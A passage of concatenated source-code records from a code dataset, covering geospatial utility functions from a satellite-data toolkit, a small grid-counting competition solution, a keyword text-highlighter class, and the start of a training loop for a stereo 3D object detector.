min_vertices\n ]\n except KeyError:\n line_features = [\n LineString(i[:, [1, 0]])\n for i in find_contours(da_i.data, z_value + 1e-12)\n if i.shape[0] >= min_vertices\n ]\n\n # Output resulting lines into a single combined MultiLineString\n return MultiLineString(line_features)\n\n def _time_format(i, time_format):\n \"\"\"\n Converts numpy.datetime64 into formatted strings;\n otherwise returns data as-is.\n \"\"\"\n if isinstance(i, np.datetime64):\n ts = pd.to_datetime(str(i))\n i = ts.strftime(time_format)\n return i\n\n # Verify input data is a xr.DataArray\n if not isinstance(da, xr.DataArray):\n raise ValueError(\n \"The input `da` is not an xarray.DataArray. \"\n \"If you supplied an xarray.Dataset, pass in one \"\n \"of its data variables using the syntax \"\n \"`da=ds.`.\"\n )\n\n # Add GeoBox and odc.* accessor to array using `odc-geo`\n da = add_geobox(da, crs)\n\n # If z_values is supplied is not a list, convert to list:\n z_values = (\n z_values\n if (isinstance(z_values, list) or isinstance(z_values, np.ndarray))\n else [z_values]\n )\n\n # If dask collection, load into memory\n if dask.is_dask_collection(da):\n if verbose:\n print(f\"Loading data into memory using Dask\")\n da = da.compute()\n\n # Test number of dimensions in supplied data array\n if len(da.shape) == 2:\n if verbose:\n print(f\"Operating in multiple z-value, single array mode\")\n dim = \"z_value\"\n contour_arrays = {\n _time_format(i, time_format): _contours_to_multiline(da, i, min_vertices)\n for i in z_values\n }\n\n else:\n # Test if only a single z-value is given when operating in\n # single z-value, multiple arrays mode\n if verbose:\n print(f\"Operating in single z-value, multiple arrays mode\")\n if len(z_values) > 1:\n raise ValueError(\n \"Please provide a single z-value when operating \"\n \"in single z-value, multiple arrays mode\"\n )\n\n contour_arrays = {\n _time_format(i, time_format): _contours_to_multiline(\n da_i, z_values[0], min_vertices\n )\n for i, da_i in da.groupby(dim)\n }\n\n # If attributes are provided, add the contour keys to that dataframe\n if attribute_df is not None:\n try:\n attribute_df.insert(0, dim, contour_arrays.keys())\n\n # If this fails, it is due to the applied attribute table not\n # matching the structure of the loaded data\n except ValueError:\n if len(da.shape) == 2:\n raise ValueError(\n f\"The provided `attribute_df` contains a different \"\n f\"number of rows ({len(attribute_df.index)}) \"\n f\"than the number of supplied `z_values` \"\n f\"({len(z_values)}).\"\n )\n else:\n raise ValueError(\n f\"The provided `attribute_df` contains a different \"\n f\"number of rows ({len(attribute_df.index)}) \"\n f\"than the number of arrays along the '{dim}' \"\n f\"dimension ({len(da[dim])}).\"\n )\n\n # Otherwise, use the contour keys as the only main attributes\n else:\n attribute_df = list(contour_arrays.keys())\n\n # Convert output contours to a geopandas.GeoDataFrame\n contours_gdf = gpd.GeoDataFrame(\n data=attribute_df, geometry=list(contour_arrays.values()), crs=da.odc.crs\n )\n\n # Define affine and use to convert array coords to geographic coords.\n # We need to add 0.5 x pixel size to the x and y to obtain the centre\n # point of our pixels, rather than the top-left corner\n affine = da.odc.geobox.transform\n shapely_affine = [\n affine.a,\n affine.b,\n affine.d,\n affine.e,\n affine.xoff + affine.a / 2.0,\n affine.yoff + affine.e / 2.0,\n ]\n contours_gdf[\"geometry\"] = contours_gdf.affine_transform(shapely_affine)\n\n # Rename the data column to match the dimension\n contours_gdf = contours_gdf.rename({0: dim}, axis=1)\n\n # Drop empty timesteps\n empty_contours = contours_gdf.geometry.is_empty\n failed = \", \".join(map(str, contours_gdf[empty_contours][dim].to_list()))\n contours_gdf = contours_gdf[~empty_contours]\n\n # Raise exception if no data is returned, or if any contours fail\n # when `errors='raise'. Otherwise, print failed contours\n if empty_contours.all() and errors == \"raise\":\n raise ValueError(\n \"Failed to generate any valid contours; verify that \"\n \"values passed to `z_values` are valid and present \"\n \"in `da`\"\n )\n elif empty_contours.all() and errors == \"ignore\":\n if verbose:\n print(\n \"Failed to generate any valid contours; verify that \"\n \"values passed to `z_values` are valid and present \"\n \"in `da`\"\n )\n elif empty_contours.any() and errors == \"raise\":\n raise Exception(f\"Failed to generate contours: {failed}\")\n elif empty_contours.any() and errors == \"ignore\":\n if verbose:\n print(f\"Failed to generate contours: {failed}\")\n\n # If asked to write out file, test if GeoJSON or ESRI Shapefile. If\n # GeoJSON, convert to EPSG:4326 before exporting.\n if output_path and output_path.endswith(\".geojson\"):\n if verbose:\n print(f\"Writing contours to {output_path}\")\n contours_gdf.to_crs(\"EPSG:4326\").to_file(filename=output_path)\n\n if output_path and output_path.endswith(\".shp\"):\n if verbose:\n print(f\"Writing contours to {output_path}\")\n contours_gdf.to_file(filename=output_path)\n\n return contours_gdf\n\n\ndef interpolate_2d(\n ds, x_coords, y_coords, z_coords, method=\"linear\", factor=1, verbose=False, **kwargs\n):\n \"\"\"\n This function takes points with X, Y and Z coordinates, and\n interpolates Z-values across the extent of an existing xarray\n dataset. This can be useful for producing smooth surfaces from point\n data that can be compared directly against satellite data derived\n from an OpenDataCube query.\n\n Supported interpolation methods include 'linear', 'nearest' and\n 'cubic (using `scipy.interpolate.griddata`), and 'rbf' (using\n `scipy.interpolate.Rbf`).\n\n Last modified: February 2020\n\n Parameters\n ----------\n ds : xarray DataArray or Dataset\n A two-dimensional or multi-dimensional array from which x and y\n dimensions will be copied and used for the area in which to\n interpolate point data.\n x_coords, y_coords : numpy array\n Arrays containing X and Y coordinates for all points (e.g.\n longitudes and latitudes).\n z_coords : numpy array\n An array containing Z coordinates for all points (e.g.\n elevations). These are the values you wish to interpolate\n between.\n method : string, optional\n The method used to interpolate between point values. This string\n is either passed to `scipy.interpolate.griddata` (for 'linear',\n 'nearest' and 'cubic' methods), or used to specify Radial Basis\n Function interpolation using `scipy.interpolate.Rbf` ('rbf').\n Defaults to 'linear'.\n factor : int, optional\n An optional integer that can be used to subsample the spatial\n interpolation extent to obtain faster interpolation times, then\n up-sample this array back to the original dimensions of the\n data as a final step. For example, setting `factor=10` will\n interpolate data into a grid that has one tenth of the\n resolution of `ds`. This approach will be significantly faster\n than interpolating at full resolution, but will potentially\n produce less accurate or reliable results.\n verbose : bool, optional\n Print debugging messages. Default False.\n **kwargs :\n Optional keyword arguments to pass to either\n `scipy.interpolate.griddata` (if `method` is 'linear', 'nearest'\n or 'cubic'), or `scipy.interpolate.Rbf` (is `method` is 'rbf').\n\n Returns\n -------\n interp_2d_array : xarray DataArray\n An xarray DataArray containing with x and y coordinates copied\n from `ds_array`, and Z-values interpolated from the points data.\n \"\"\"\n\n # Extract xy and elev points\n points_xy = np.vstack([x_coords, y_coords]).T\n\n # Extract x and y coordinates to interpolate into.\n # If `factor` is greater than 1, the coordinates will be subsampled\n # for faster run-times. If the last x or y value in the subsampled\n # grid aren't the same as the last x or y values in the original\n # full resolution grid, add the final full resolution grid value to\n # ensure data is interpolated up to the very edge of the array\n if ds.x[::factor][-1].item() == ds.x[-1].item():\n x_grid_coords = ds.x[::factor].values\n else:\n x_grid_coords = ds.x[::factor].values.tolist() + [ds.x[-1].item()]\n\n if ds.y[::factor][-1].item() == ds.y[-1].item():\n y_grid_coords = ds.y[::factor].values\n else:\n y_grid_coords = ds.y[::factor].values.tolist() + [ds.y[-1].item()]\n\n # Create grid to interpolate into\n grid_y, grid_x = np.meshgrid(x_grid_coords, y_grid_coords)\n\n # Apply scipy.interpolate.griddata interpolation methods\n if method in (\"linear\", \"nearest\", \"cubic\"):\n # Interpolate x, y and z values\n interp_2d = scipy.interpolate.griddata(\n points=points_xy,\n values=z_coords,\n xi=(grid_y, grid_x),\n method=method,\n **kwargs,\n )\n\n # Apply Radial Basis Function interpolation\n elif method == \"rbf\":\n # Interpolate x, y and z values\n rbf = scipy.interpolate.Rbf(x_coords, y_coords, z_coords, **kwargs)\n interp_2d = rbf(grid_y, grid_x)\n\n # Create xarray dataarray from the data and resample to ds coords\n interp_2d_da = xr.DataArray(\n interp_2d, coords=[y_grid_coords, x_grid_coords], dims=[\"y\", \"x\"]\n )\n\n # If factor is greater than 1, resample the interpolated array to\n # match the input `ds` array\n if factor > 1:\n interp_2d_da = interp_2d_da.interp_like(ds)\n\n return interp_2d_da\n\n\ndef contours_to_arrays(gdf, col):\n \"\"\"\n This function converts a polyline shapefile into an array with three\n columns giving the X, Y and Z coordinates of each vertex. This data\n can then be used as an input to interpolation procedures (e.g. using\n a function like `interpolate_2d`.\n\n Last modified: October 2021\n\n Parameters\n ----------\n gdf : Geopandas GeoDataFrame\n A GeoPandas GeoDataFrame of lines to convert into point\n coordinates.\n col : str\n A string giving the name of the GeoDataFrame field to use as\n Z-values.\n\n Returns\n -------\n A numpy array with three columns giving the X, Y and Z coordinates\n of each vertex in the input GeoDataFrame.\n\n \"\"\"\n\n coords_zvals = []\n\n for i in range(0, len(gdf)):\n val = gdf.iloc[i][col]\n\n try:\n coords = np.concatenate(\n [np.vstack(x.coords.xy).T for x in gdf.iloc[i].geometry.geoms]\n )\n except:\n coords = np.vstack(gdf.iloc[i].geometry.coords.xy).T\n\n coords_zvals.append(\n np.column_stack((coords, np.full(np.shape(coords)[0], fill_value=val)))\n )\n\n return np.concatenate(coords_zvals)\n\n\ndef largest_region(bool_array, **kwargs):\n \"\"\"\n Takes a boolean array and identifies the largest contiguous region of\n connected True values. This is returned as a new array with cells in\n the largest region marked as True, and all other cells marked as False.\n\n Parameters\n ----------\n bool_array : boolean array\n A boolean array (numpy or xarray.DataArray) with True values for\n the areas that will be inspected to find the largest group of\n connected cells\n **kwargs :\n Optional keyword arguments to pass to `measure.label`\n\n Returns\n -------\n largest_region : boolean array\n A boolean array with cells in the largest region marked as True,\n and all other cells marked as False.\n\n \"\"\"\n\n # First, break boolean array into unique, discrete regions/blobs\n blobs_labels = label(bool_array, background=0, **kwargs)\n\n # Count the size of each blob, excluding the background class (0)\n ids, counts = np.unique(blobs_labels[blobs_labels > 0], return_counts=True)\n\n # Identify the region ID of the largest blob\n largest_region_id = ids[np.argmax(counts)]\n\n # Produce a boolean array where 1 == the largest region\n largest_region = blobs_labels == largest_region_id\n\n return largest_region\n\n\ndef transform_geojson_wgs_to_epsg(geojson, EPSG):\n \"\"\"\n Takes a geojson dictionary and converts it from WGS84 (EPSG:4326) to desired EPSG\n\n Parameters\n ----------\n geojson: dict\n a geojson dictionary containing a 'geometry' key, in WGS84 coordinates\n EPSG: int\n numeric code for the EPSG coordinate referecnce system to transform into\n\n Returns\n -------\n transformed_geojson: dict\n a geojson dictionary containing a 'coordinates' key, in the desired CRS\n\n \"\"\"\n gg = Geometry(geojson[\"geometry\"], CRS(\"epsg:4326\"))\n gg = gg.to_crs(CRS(f\"epsg:{EPSG}\"))\n return gg.__geo_interface__\n\n\ndef zonal_stats_parallel(shp, raster, statistics, out_shp, ncpus, **kwargs):\n \"\"\"\n Summarizing raster datasets based on vector geometries in parallel.\n Each cpu recieves an equal chunk of the dataset.\n Utilizes the perrygeo/rasterstats package.\n\n Parameters\n ----------\n shp : str\n Path to shapefile that contains polygons over\n which zonal statistics are calculated\n raster: str\n Path to the raster from which the statistics are calculated.\n This can be a virtual raster (.vrt).\n statistics: list\n list of statistics to calculate. e.g.\n ['min', 'max', 'median', 'majority', 'sum']\n out_shp: str\n Path to export shapefile containing zonal statistics.\n ncpus: int\n number of cores to parallelize the operations over.\n kwargs:\n Any other keyword arguments to rasterstats.zonal_stats()\n See https://github.com/perrygeo/python-rasterstats for\n all options\n\n Returns\n -------\n Exports a shapefile to disk containing the zonal statistics requested\n\n \"\"\"\n\n # yields n sized chunks from list l (used for splitting task to multiple processes)\n def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i : i + n]\n\n # calculates zonal stats and adds results to a dictionary\n def worker(z, raster, d):\n z_stats = zonal_stats(z, raster, stats=statistics, **kwargs)\n for i in range(0, len(z_stats)):\n d[z[i][\"id\"]] = z_stats[i]\n\n # write output polygon\n def write_output(zones, out_shp, d):\n # copy schema and crs from input and add new fields for each statistic\n schema = zones.schema.copy()\n crs = zones.crs\n for stat in statistics:\n schema[\"properties\"][stat] = \"float\"\n\n with fiona.open(out_shp, \"w\", \"ESRI Shapefile\", schema, crs) as output:\n for elem in zones:\n for stat in statistics:\n elem[\"properties\"][stat] = d[elem[\"id\"]][stat]\n output.write(\n {\n \"properties\": elem[\"properties\"],\n \"geometry\": mapping(shape(elem[\"geometry\"])),\n }\n )\n\n with fiona.open(shp) as zones:\n jobs = []\n\n # create manager dictionary (polygon ids=keys, stats=entries)\n # where multiple processes can write without conflicts\n man = mp.Manager()\n d = man.dict()\n\n # split zone polygons into 'ncpus' chunks for parallel processing\n # and call worker() for each\n split = chunks(zones, len(zones) // ncpus)\n for z in split:\n p = mp.Process(target=worker, args=(z, raster, d))\n p.start()\n jobs.append(p)\n\n # wait that all chunks are finished\n [j.join() for j in jobs]\n\n write_output(zones, out_shp, d)\n\n\ndef reverse_geocode(coords, site_classes=None, state_classes=None):\n \"\"\"\n Takes a latitude and longitude coordinate, and performs a reverse\n geocode to return a plain-text description of the location in the\n form:\n\n Site, State\n\n E.g.: `reverse_geocode(coords=(-35.282163, 149.128835))`\n\n 'Canberra, Australian Capital Territory'\n\n Parameters\n ----------\n coords : tuple of floats\n A tuple of (latitude, longitude) coordinates used to perform\n the reverse geocode.\n site_classes : list of strings, optional\n A list of strings used to define the site part of the plain\n text location description. Because the contents of the geocoded\n address can vary greatly depending on location, these strings\n are tested against the address one by one until a match is made.\n Defaults to: `['city', 'town', 'village', 'suburb', 'hamlet',\n 'county', 'municipality']`.\n state_classes : list of strings, optional\n A list of strings used to define the state part of the plain\n text location description. These strings are tested against the\n address one by one until a match is made. Defaults to:\n `['state', 'territory']`.\n\n Returns\n -------\n If a valid geocoded address is found, a plain text location\n description will be returned:\n\n 'Site, State'\n\n If no valid address is found, formatted coordinates will be returned\n instead:\n\n 'XX.XX S, XX.XX E'\n\n \"\"\"\n\n # Run reverse geocode using coordinates\n geocoder = Nominatim(user_agent=\"Digital Earth Australia\")\n\n # Create plain text-coords as fall-back\n lat = f\"{-coords[0]:.2f} S\" if coords[0] < 0 else f\"{coords[0]:.2f} N\"\n lon = f\"{-coords[1]:.2f} W\" if coords[1] < 0 else f\"{coords[1]:.2f} E\"\n\n try:\n # Get address from geocoded data\n out = geocoder.reverse(coords)\n address = out.raw[\"address\"]\n\n # Use site and state classes if supplied; else use defaults\n default_site_classes = [\n \"city\",\n \"town\",\n \"village\",\n \"suburb\",\n \"hamlet\",\n \"county\",\n \"municipality\",\n ]\n default_state_classes = [\"state\", \"territory\"]\n site_classes = site_classes if site_classes else default_site_classes\n state_classes = state_classes if state_classes else default_state_classes\n\n # Return the first site or state class that exists in address dict\n site = next((address[k] for k in site_classes if k in address), None)\n state = next((address[k] for k in state_classes if k in address), None)\n\n # If site and state exist in the data, return this.\n # Otherwise, return N/E/S/W coordinates.\n if site and state:\n # Return as site, state formatted string\n return f\"{site}, {state}\"\n\n else:\n # If no geocoding result, return N/E/S/W coordinates\n print(\"No valid geocoded location; returning coordinates instead\")\n return f\"{lat}, {lon}\"\n\n except (KeyError, AttributeError, GeocoderUnavailable, GeocoderServiceError):\n # If no geocoding result, return N/E/S/W coordinates\n print(\"No valid geocoded location; returning coordinates instead\")\n return f\"{lat}, {lon}\"\n\n\ndef hillshade(dem, elevation, azimuth, vert_exag=1, dx=30, dy=30):\n \"\"\"\n Calculate hillshade from an input Digital Elevation Model\n (DEM) array and a sun elevation and azimith.\n\n Parameters:\n -----------\n dem : numpy.array\n A 2D Digital Elevation Model array.\n elevation : int or float\n Sun elevation (0-90, degrees up from horizontal).\n azimith : int or float\n Sun azimuth (0-360, degrees clockwise from north).\n vert_exag : int or float, optional\n The amount to exaggerate the elevation values by\n when calculating illumination. This can be used either\n to correct for differences in units between the x-y coordinate\n system and the elevation coordinate system (e.g. decimal\n degrees vs. meters) or to exaggerate or de-emphasize\n topographic effects.\n dx : int or float, optional\n The x-spacing (columns) of the input DEM. This\n is typically the spatial resolution of the DEM.\n dy : int or float, optional\n The y-spacing (rows) of the input input DEM. This\n is typically the spatial resolution of the DEM.\n\n Returns:\n --------\n hs : numpy.array\n A 2D hillshade array with values between 0-1, where\n 0 is completely in shadow and 1 is completely\n illuminated.\n \"\"\"\n\n from matplotlib.colors import LightSource\n\n hs = LightSource(azdeg=azimuth, altdeg=elevation).hillshade(\n dem, vert_exag=vert_exag, dx=dx, dy=dy\n )\n return hs\n\n\ndef sun_angles(dc, query):\n \"\"\"\n For a given spatiotemporal query, calculate mean sun\n azimuth and elevation for each satellite observation, and\n return these as a new `xarray.Dataset` with 'sun_elevation'\n and 'sun_azimuth' variables.\n\n Parameters:\n -----------\n dc : datacube.Datacube object\n Datacube instance used to load data.\n query : dict\n A dictionary containing query parameters used to identify\n satellite observations and load metadata.\n\n Returns:\n --------\n sun_angles_ds : xarray.Dataset\n An `xarray.set` containing a 'sun_elevation' and\n 'sun_azimuth' variables.\n \"\"\"\n\n from datacube.api.query import query_group_by\n from datacube.model.utils import xr_apply\n\n # Identify satellite datasets and group outputs using the\n # same approach used to group satellite imagery (i.e. solar day)\n gb = query_group_by(**query)\n datasets = dc.find_datasets(**query)\n dataset_array = dc.group_datasets(datasets, gb)\n\n # Load and take the mean of metadata from each product\n sun_azimuth = xr_apply(\n dataset_array,\n lambda t, dd: np.mean([d.metadata.eo_sun_azimuth for d in dd]),\n dtype=float,\n )\n sun_elevation = xr_apply(\n dataset_array,\n lambda t, dd: np.mean([d.metadata.eo_sun_elevation for d in dd]),\n dtype=float,\n )\n\n # Combine into new xarray.Dataset\n sun_angles_ds = xr.merge(\n [sun_elevation.rename(\"sun_elevation\"), sun_azimuth.rename(\"sun_azimuth\")]\n )\n\n return sun_angles_ds\n","repo_name":"GeoscienceAustralia/dea-notebooks","sub_path":"Tools/dea_tools/spatial.py","file_name":"spatial.py","file_ext":"py","file_size_in_byte":37649,"program_lang":"python","lang":"en","doc_type":"code","stars":394,"dataset":"github-code","pt":"47"} +{"seq_id":"18890528845","text":"infile=open('surfin.txt','r').readlines()\r\noutfile=open('surfout.txt','w')\r\nr,c=map(int,infile[0].split())\r\nlines=[line.strip() for line in infile[1:]]\r\ngood=[(r-1,c-1)]\r\n\r\ndef checker1(square):\r\n row=square[0]\r\n col=square[1]\r\n if row>0 and lines[row-1][col]=='v':\r\n good.append((row-1,col))\r\ndef checker2(square):\r\n row=square[0]\r\n col=square[1]\r\n if col>0 and lines[row][col-1]=='>':\r\n good.append((row,col-1))\r\ncount=0\r\nwhile len(good)>0:\r\n square=good.pop()\r\n count+=1\r\n checker1(square)\r\n checker2(square)\r\n\r\noutfile.write(str(r*c-count))\r\noutfile.close()","repo_name":"eddiegz/Personal-C","sub_path":"AIO/crowd surfing/surfing dfs.py","file_name":"surfing dfs.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"74475219343","text":"import re\n\nDEFAULT_HIGHLIGHT_PRE = \"\"\nDEFAULT_HIGHLIGHT_POST = \"\"\n\nclass TextHighlighter(object):\n\n def __init__(self, max_ngram_size, highlight_pre = DEFAULT_HIGHLIGHT_PRE, highlight_post = DEFAULT_HIGHLIGHT_POST):\n \"\"\"\n TextHighlighter constructor. Define highlight text snippets\n\n :max_ngram_size - Specifies the maximum ngram size in the keywords. \n :highlight_pre – Specifies the text that should appear before a highlighted term.(e.g. ). It defaults to \n :highlight_post – Specifies the text that should appear after a highlighted term. (e.g. ). It defaults to \n \"\"\"\n\n self.highlight_pre = highlight_pre\n self.highlight_post = highlight_post\n self.max_ngram_size = max_ngram_size\n\n def highlight(self, text, keywords):\n \"\"\"\n Returns the highlighted text snippets of matching text in the original data\n \"\"\"\n\n n_text = ''\n # extract only the kw\n if(len(keywords) > 0):\n kw_list = keywords\n\n if(type(keywords[0]) == tuple):\n kw_list = [x[0] for x in keywords]\n\n text = text.strip()\n if self.max_ngram_size == 1:\n n_text = self.format_one_gram_text(text, kw_list)\n elif self.max_ngram_size > 1:\n n_text = self.format_n_gram_text(text, kw_list, self.max_ngram_size)\n\n return n_text\n\n def format_one_gram_text(self, text, relevant_words_array):\n text_tokens = text.replace('\\n',' ').split(' ')\n relevant_words_array = [kw.lower() for kw in relevant_words_array]\n try:\n for tk in range(len(text_tokens)):\n kw = re.sub('[!\",:.;?()]$|^[!\",:.;?()]|\\W[\"!,:.;?()]', '', text_tokens[tk])\n if kw.lower() in relevant_words_array:\n text_tokens[tk] = text_tokens[tk].replace(kw, self.highlight_pre + kw + self.highlight_post)\n except:\n pass\n new_text = ' '.join(text_tokens)\n return new_text\n\n def format_n_gram_text(self, text, relevant_words_array, n_gram):\n text_tokens = text.replace('\\n',' ').split(' ')\n relevant_words_array = [kw.lower() for kw in relevant_words_array]\n\n y = 0\n final_splited_text = []\n final_startends = []\n while y < len(text_tokens):\n #print(y)\n #print(final_splited_text)\n\n splited_n_gram_kw_list = []\n n_gram_kw_list = []\n n_gram_word_list, splited_n_gram_kw_list = self.find_more_relevant(y, text_tokens, n_gram, relevant_words_array, n_gram_kw_list, splited_n_gram_kw_list)\n if n_gram_word_list:\n\n if len(n_gram_word_list[0].split(' ')) == 1:\n y, new_expression, txt, startend = self.replace_token(text_tokens, y, n_gram_word_list)\n final_splited_text.append(new_expression)\n else:\n kw_list = []\n splited_n_gram_kw_list = []\n splited_one = n_gram_word_list[0].split()\n\n for len_kw in range(0, len(splited_one)):\n kw_list, splited_n_gram_kw_list = self.find_more_relevant(y+len_kw, text_tokens, n_gram, relevant_words_array, kw_list, splited_n_gram_kw_list)\n min_score_word = min(kw_list, key=lambda x: relevant_words_array.index(x.lower()))\n\n if kw_list.index(min_score_word) == 0:\n term_list = [min_score_word]\n y, new_expression, txt, startend = self.replace_token(text_tokens, y, term_list)\n final_splited_text.append(new_expression)\n #print(text[startend[0]])\n #print(text[startend[1]])\n #print(txt)\n #print(startend)\n #print(new_expression)\n final_startends.append(startend)\n\n elif kw_list.index(min_score_word) >= 1:\n index_of_more_relevant = splited_n_gram_kw_list[0].index(min_score_word.split()[0])\n temporal_kw = ' '.join(splited_n_gram_kw_list[0][:index_of_more_relevant])\n if temporal_kw in relevant_words_array:\n try:\n if relevant_words_array.index(temporal_kw) > relevant_words_array.index(final_splited_text[-1] +' '+temporal_kw) and not re.findall(self.highlight_pre, final_splited_text[-1]):\n term_list = [final_splited_text[-1] +' '+temporal_kw]\n del final_splited_text[-1]\n y -= 1\n y, new_expression, txt, startend = self.replace_token(text_tokens, y, term_list)\n final_splited_text.append(new_expression)\n else:\n term_list = [temporal_kw]\n y, new_expression, txt, startend = self.replace_token(text_tokens, y, term_list)\n final_splited_text.append(new_expression)\n except:\n term_list = [temporal_kw]\n y, new_expression, txt, startend = self.replace_token(text_tokens, y, term_list)\n final_splited_text.append(new_expression)\n\n else:\n for tmp_kw in splited_n_gram_kw_list[0][:index_of_more_relevant]:\n if tmp_kw in relevant_words_array:\n term_list = [tmp_kw]\n y, new_expression, txt, startend = self.replace_token(text_tokens, y, term_list)\n final_splited_text.append(new_expression)\n else:\n final_splited_text.append(text_tokens[y])\n y += 1\n\n else:\n final_splited_text.append(text_tokens[y])\n y += 1\n new_text = ' '.join(final_splited_text)\n\n return new_text, final_startends\n\n\n def find_more_relevant(self, y, text_tokens, n_gram, relevant_words_array, kw_list, splited_n_gram_word_list):\n temporary_list = []\n temporary_list_two = []\n for i in range(n_gram):\n\n temporary_list.append(text_tokens[y:y + i + 1])\n k = re.sub('''[!\",:.;?()]$|^[!\",':.;?()]|\\W[\"!,:.;?()]''', '', ' '.join(temporary_list[i]))\n\n if k.lower() in relevant_words_array:\n temporary_list_two.append(k)\n\n n_gram_word_list = sorted(temporary_list_two, key=lambda x: relevant_words_array.index(x.lower()))\n\n try:\n kw_list.append(n_gram_word_list[0])\n splited_n_gram_word_list.append(n_gram_word_list[0].split())\n except:\n pass\n\n return kw_list, splited_n_gram_word_list\n\n\n def replace_token(self, text_tokens, y, n_gram_word_list):\n txt = ' '.join(text_tokens[y:y + len(n_gram_word_list[0].split(' '))])\n \n start = self.find_start(text_tokens, n_gram_word_list)\n end = self.find_end(text_tokens, n_gram_word_list, start)\n startend = (start, end)\n\n new_expression = txt.replace(re.sub('[!\",:.;?()]$|^[!\",:.;?()]|\\W[\"!,:.;?()]', '', txt), self.highlight_pre + n_gram_word_list[0] + self.highlight_post)\n y += len(n_gram_word_list[0].split(' '))\n return y, new_expression, txt, startend\n \n def find_start(self, text_tokens, n_gram_word_list):\n count = 0\n for i in text_tokens:\n if count != 0:\n count = count + 1 # space that was split off\n if i != n_gram_word_list[0].split(' ')[0]:\n for j in i:\n count = count + len(j)\n else:\n \treturn(count)\n return(count)\n \n def find_end(self, text_tokens, n_gram_word_list, start):\n count = 0\n for i in n_gram_word_list[0].split(' '):\n if count != 0:\n count = count + 1\n count = count + len(i)\n if start > 0:\n return(start + count - 1)\n else:\n return(start)\n","repo_name":"MafaldaMatos/yake-spacy","sub_path":"build/lib/highlight.py","file_name":"highlight.py","file_ext":"py","file_size_in_byte":8426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"34251927175","text":"import os\nimport tqdm\n\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport time\nimport shutil\n\nfrom lib.helpers.save_helper import get_checkpoint_state\nfrom lib.helpers.save_helper import load_checkpoint\nfrom lib.helpers.save_helper import save_checkpoint\nfrom torch.nn.utils import clip_grad_norm_\nfrom progress.bar import Bar\n\nfrom lib.helpers.decode_helper import extract_dets_from_stereo_outputs\nfrom lib.helpers.decode_helper import decode_detections\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n if self.count > 0:\n self.avg = self.sum / self.count\n\n\nclass Trainer(object):\n def __init__(self,\n cfg,\n model,\n optimizer,\n train_loader,\n test_loader,\n lr_scheduler,\n warmup_lr_scheduler,\n logger):\n self.cfg = cfg\n self.model = model\n self.optimizer = optimizer\n self.train_loader = train_loader\n self.test_loader = test_loader\n self.lr_scheduler = lr_scheduler\n self.warmup_lr_scheduler = warmup_lr_scheduler\n self.logger = logger\n self.epoch = 0\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n self.model = self.model.cuda()\n\n self.class_name = self.test_loader.dataset.class_name\n # loading pretrain/resume model\n if cfg.get('pretrain_model'):\n assert os.path.exists(cfg['pretrain_model'])\n load_checkpoint(model=self.model,\n optimizer=None,\n filename=cfg['pretrain_model'],\n map_location=self.device,\n logger=self.logger)\n\n if cfg.get('resume_model', None):\n assert os.path.exists(cfg['resume_model'])\n self.epoch = load_checkpoint(model=self.model,\n optimizer=self.optimizer,\n filename=cfg['resume_model'],\n map_location=self.device,\n logger=self.logger)\n self.lr_scheduler.last_epoch = self.epoch - 1\n\n # # DDP\n # self.model = torch.nn.parallel.DistributedDataParallel(\n # self.model, device_ids=[rank % torch.cuda.device_count()], find_unused_parameters=True)\n\n self.model = torch.nn.DataParallel(self.model).cuda()\n\n def train(self):\n start_epoch = self.epoch\n\n progress_bar = tqdm.tqdm(range(start_epoch, self.cfg['max_epoch']), dynamic_ncols=True, leave=True, desc='epochs')\n for epoch in range(start_epoch, self.cfg['max_epoch']):\n # reset random seed\n # ref: https://github.com/pytorch/pytorch/issues/5059\n np.random.seed(np.random.get_state()[1][0] + epoch)\n # train one epoch\n self.train_one_epoch()\n self.epoch += 1\n\n # update learning rate\n if self.warmup_lr_scheduler is not None and epoch < 5:\n self.warmup_lr_scheduler.step()\n else:\n self.lr_scheduler.step(self.epoch)\n\n\n #save trained model\n if (self.epoch % self.cfg['save_frequency']) == 0:\n os.makedirs('checkpoints', exist_ok=True)\n ckpt_name = os.path.join('checkpoints', 'checkpoint_epoch_%d' % self.epoch)\n save_checkpoint(get_checkpoint_state(self.model, self.optimizer, self.epoch), ckpt_name)\n\n if (self.epoch % self.cfg['eval_frequency']) == 0:\n self.inference()\n progress_bar.update()\n\n return None\n\n\n def train_one_epoch(self):\n self.model.train()\n loss_stats = ['seg_loss', 'offset2d_left_loss', 'offset2d_right_loss', 'size_2d_left_loss', 'width_right_loss']\n data_time, batch_time = AverageMeter(), AverageMeter()\n avg_loss_stats = {l: AverageMeter() for l in loss_stats}\n num_iters = len(self.train_loader)\n bar = Bar('{}/{}'.format(\"3D\", \"Stereo\"), max=num_iters)\n end = time.time()\n\n #progress_bar = tqdm.tqdm(total=len(self.train_loader), leave=(self.epoch+1 == self.cfg['max_epoch']), desc='iters')\n for batch_idx, inputs in enumerate(self.train_loader):\n for key, val in inputs.items():\n if not isinstance(val, np.ndarray):\n continue\n if key in ['frame_id', 'metadata', 'calib']:\n continue\n # TODO\n if key in ['left_img' , 'right_img']:\n inputs[key] = torch.from_numpy(val).float().cuda()\n #inputs[key] = kornia.image_to_tensor(val).float().cuda()\n elif key in ['image_shape']:\n inputs[key] = torch.from_numpy(val).int().cuda()\n else:\n inputs[key] = torch.from_numpy(val).float().cuda()\n\n # train one batch\n self.optimizer.zero_grad()\n ret_dict, tb_dict = self.model(inputs)\n\n loss = ret_dict.mean()\n loss.backward()\n #clip_grad_norm_(self.model.parameters(), 10)\n self.optimizer.step()\n\n batch_time.update(time.time() - end)\n end = time.time()\n Bar.suffix = '{phase}: [{0}][{1}/{2}]|Tot: {total:} |ETA: {eta:} '.format(\n self.epoch, batch_idx, num_iters, phase=\"train\",\n total=bar.elapsed_td, eta=bar.eta_td)\n\n for l in avg_loss_stats:\n avg_loss_stats[l].update(\n tb_dict[l], inputs['left_img'].shape[0])\n Bar.suffix = Bar.suffix + '|{} {:.4f} '.format(l, avg_loss_stats[l].avg)\n\n bar.next()\n 